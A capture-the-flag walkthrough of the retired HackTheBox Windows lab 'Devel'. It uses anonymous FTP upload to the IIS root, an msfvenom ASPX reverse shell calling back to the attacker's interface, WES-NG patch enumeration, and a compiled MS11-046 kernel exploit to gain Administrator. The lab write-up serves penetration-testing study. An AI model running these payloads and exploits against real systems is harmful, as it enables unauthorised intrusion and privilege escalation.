Today we are going to solve a another bootoroot window machine created by ch4p . Its a retired lab which is available in hackthebox retired section . Let jumb into it .
Level : Easy
- Networking Scanning
- FTP Enumeration
- ASPX reverse shell
- Privilege Escalation
- MS11-046 Exploit
IP address : 10.129.68.202
we start our machine by firing Nmap with aggressive scan in which OS detection , Default Script Scan , Trace route , Version scanning is done .
nmap -A 10.129.68.202
The output of Nmap show that there is port 21 for FTP with anonymous login is allowed which gives a window to get our initial foothold . It also show that this machine is window based and On port 80 IIS server is hosted .
Nmap scan report for 10.129.68.202 Host is up (0.16s latency). Not shown: 998 filtered ports PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd | ftp-anon: Anonymous FTP login allowed (FTP code 230) | 03-18-17 02:06AM <DIR> aspnet_client | 03-17-17 05:37PM 689 iisstart.htm |_03-17-17 05:37PM 184946 welcome.png | ftp-syst: |_ SYST: Windows_NT 80/tcp open http Microsoft IIS httpd 7.5 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/7.5 |_http-title: IIS7 Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Now here we start enumerating the port 21 i.e FTP service and here one thing catch our eye that IIS root directory is accessible as the ftp shared folder is same as the IIS shared directory .
echo "10.129.68.202 devel.htb" | sudo tee -a /etc/hosts Username : Anonymous Password : Anonymous ftp devil.htb
we can confirm by adding the temporary file on Target machine then we can check weather we can access over HTTP protocol . So we add the small HTML file with some text and then we check it out by accessing the path of the file .
After successfully access our temporary page we can now go exploitation . Here we are going to create the payload in aspx format . For more to learn why we use ASPX payload you can check out here .
msfvenom -p windows/shell_reverse_tcp LHOST=tun0 LPORT=4445 -f aspx > shell.aspx
Once the payload is ready , its time to test it by uploading using FTP Service and once its uploaded we can call the file with help of curl or your browser and we get our initial foothold on the lab .
If everything done correctly we get our shell .
Now its time to get the higher power for that we need to get administrator right for that we have to enumerate more about the machine and we start with getting some information about the machine what is the OS version , and patches or any other information which we can use in later part , for that window have the systeminfo command which we can use to enumerate the machines .
systeminfo.exe > systeminfo.txt
Host Name: DEVEL OS Name: Microsoft Windows 7 Enterprise OS Version: 6.1.7600 N/A Build 7600 OS Manufacturer: Microsoft Corporation OS Configuration: Standalone Workstation OS Build Type: Multiprocessor Free Registered Owner: babis Registered Organization: Product ID: 55041-051-0948536-86302 Original Install Date: 17/3/2017, 4:17:31 �� System Boot Time: 21/4/2021, 4:49:31 �� System Manufacturer: VMware, Inc. System Model: VMware Virtual Platform System Type: X86-based PC Processor(s): 1 Processor(s) Installed. : x64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018 Windows Directory: C:\Windows System Directory: C:\Windows\system32 Boot Device: \Device\HarddiskVolume1 System Locale: el;Greek Input Locale: en-us;English (United States) Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul Total Physical Memory: 3.071 MB Available Physical Memory: 2.470 MB Virtual Memory: Max Size: 6.141 MB Virtual Memory: Available: 5.551 MB Virtual Memory: In Use: 590 MB Page File Location(s): C:\pagefile.sys Domain: HTB Logon Server: N/A Hotfix(s): N/A Network Card(s): 1 NIC(s) Installed. : vmxnet3 Ethernet Adapter Connection Name: Local Area Connection 4 DHCP Enabled: Yes DHCP Server: 10.129.0.1 IP address(es) : 10.129.68.202 : fe80::4a6:d5ca:df49:2a13 : dead:beef::f442:8dbc:7624:dbab
Now as we can see that there is no patches are installed in this machine so may we can go for kernel exploit . There are various ways to exploit it weather we can use metasploit framework module exploit suggester and then use any listed exploit or we can do it manually . For this articles we done it manually because we want to learn more .
For that we use the tool called wesng which you can get it from Github . To work with this tools all we need to pass the systeminfo so that this tool can list out all the possible ways to exploit the machines .
WES-NG is a tool based on the output of Windows’
systeminfoutility which provides the list of vulnerabilities the OS is vulnerable to, including any exploits for these vulnerabilities. Every Windows OS between Windows XP and Windows 10, including their Windows Server counterparts, is supported.
python wes.py systeminfo.txt --exploits-only -i "Elevation of Privilege"
Windows Exploit Suggester 0.98 ( https://github.com/bitsadmin/wesng/ ) [+] Parsing systeminfo output [+] Operating System - Name: Windows 7 for 32-bit Systems - Generation: 7 - Build: 7600 - Version: None - Architecture: 32-bit - Installed hotfixes: None [+] Loading definitions - Creation date of definitions: 20210416 [+] Determining missing patches [+] Applying display filters [+] Found vulnerabilities Date: 20130108 CVE: CVE-2013-0008 KB: KB2778930 Title: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege Affected product: Windows 7 for 32-bit Systems Affected component: Severity: Important Impact: Elevation of Privilege Exploit: http://www.exploit-db.com/exploits/24485 Date: 20110614 CVE: CVE-2011-1249 KB: KB2503665 Title: Vulnerability in Ancillary Function Driver Could Allow Elevation of Privilege Affected product: Windows 7 for 32-bit Systems Affected component: Severity: Important Impact: Elevation of Privilege Exploit: https://www.exploit-db.com/exploits/40564/ Date: 20110208 CVE: CVE-2010-4398 KB: KB2393802 Title: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege Affected product: Windows 7 for 32-bit Systems Affected component: Severity: Important Impact: Elevation of Privilege Exploits: http://www.exploit-db.com/bypassing-uac-with-user-privilege-under-windows-vista7-mirror/, http://www.exploit-db.com/exploits/15609/ Date: 20100209 CVE: CVE-2010-0232 KB: KB977165 Title: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege Affected product: Windows 7 for 32-bit Systems Affected component: Severity: Important Impact: Elevation of Privilege Exploits: http://lock.cmpxchg8b.com/c0af0967d904cef2ad4db766a00bc6af/KiTrap0D.zip, http://www.securityfocus.com/bid/37864 [+] Missing patches: 4 - KB977165: patches 1 vulnerability - KB2778930: patches 1 vulnerability - KB2393802: patches 1 vulnerability - KB2503665: patches 1 vulnerability [+] KB with the most recent release date - ID: KB2778930 - Release date: 20130108 [+] Done. Displaying 4 of the 236 vulnerabilities found.
Result show that there possible four exploit which we can use in my case https://www.exploit-db.com/exploits/40564/ work fine all we have to compile it . We can get the exploit from exploitdb or searchsploit can also play the role in this arena .
searchsploit -m 40564
Is time to compile the exploit for that we need GCC compiler for that we can install it as it is available on Kali repository . once the exploit is created and we can transfer to machine and run it .
sudo apt-get update && sudo apt-get install mingw-w64 i686-w64-mingw32-gcc 40564.c -o exploit.exe -lws2_32
Here we get the administrator privilege and now we can read the flag and submit it the portal .
type "C:\Users\Administrator\Desktop\root.txt" type "C:\Users\babis\Desktop\user.txt.txt"